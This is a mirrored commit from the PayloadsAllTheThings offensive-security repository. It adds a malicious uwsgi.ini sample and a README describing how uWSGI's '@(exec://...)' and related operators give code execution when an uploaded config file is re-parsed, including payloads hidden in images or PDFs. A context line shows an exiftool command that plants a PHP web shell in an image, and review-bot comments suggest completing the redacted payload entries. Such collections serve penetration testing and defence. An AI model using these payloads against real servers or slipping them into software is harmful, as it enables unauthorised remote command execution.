mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
add uwsgi configuration file to Upload Insecure File
This commit is contained in:
parent
7ef9babc9f
commit
5f8b3f8a14
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
@ -0,0 +1,32 @@
# uWSGI configuration file
uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
Example of malicious uwsgi.ini file:
```ini
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
## uWSGI lax parsing
The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...).
## Thanks to
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
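Review bot: the closing sentence of the new README, `When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.`, needs a grammar and spacing fix; suggest `When the configuration file is parsed (e.g. on restart, crash or autoreload), the payload is executed.` The same applies to `The uWSGI parsing of configuration file is lax` (`uWSGI's parsing of the configuration file is lax`) and `Example of malicious uwsgi.ini file` (`Example of a malicious uwsgi.ini file`). Four of the six entries in the fenced block keep `[REDACTED]` as the argument, so the README never shows what `data://`, `http://` and `fd://` expect; either document the argument form for each scheme or trim the block to the entries that are complete as written (`sym://`, `exec://`, `call://`). It would also help readers on the defensive side to state in one line that the trigger is any re-parse of the ini (the restart/crash/autoreload cases already listed), which is what turns a writable uwsgi.ini path behind an upload endpoint into a code-execution sink.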
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
@ -0,0 +1,13 @@
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
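Review bot: `uwsgi.ini` is a line-for-line copy of the fenced block in the new README, so the two will drift the first time either is edited; consider keeping the sample only in the README, or having the README link to this file instead of repeating it. As shipped, the `[REDACTED]` placeholders in `bar = @(data://[REDACTED])`, `test = @(http://[REDACTED])` and `content = @(fd://[REDACTED])` mean the file is not a usable sample for those three schemes, and `foo` and `characters` depend on symbols that only resolve if they exist in the running uWSGI binary; a leading comment saying that only the `exec://` entry is self-contained, or dropping the placeholder lines, would save readers from guessing which entries are meant to work as-is.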
@ -136,12 +136,14 @@ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __h
If you are trying to upload files to a :
- PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
- ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
- uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
Configuration files examples
- [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
- [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
- [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
- [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
- [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini)
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
- package.json
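Review bot: both new bullets link to the raw file `.../Configuration%20uwsgi.ini/uwsgi.ini`, whereas the neighbouring `.htaccess` and `web.config` entries link to their directories, which is where the README with the explanation lives; suggest pointing the two new links at `.../Configuration%20uwsgi.ini` so readers land on the write-up rather than the bare ini. The context line `upload a JSON file with a custom scripts` (`a custom script`) is pre-existing, but worth fixing while this section is being touched.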
@ -214,3 +216,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
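Review bot: the new reference entry carries no date while the neighbouring entries do (`Aug 4, 2022`, `September 15, 2022`); the linked URL path is `2023/02/28`, so suggest adding `February 28, 2023` to the bullet, in the same position the other entries use, for consistency with the rest of the list.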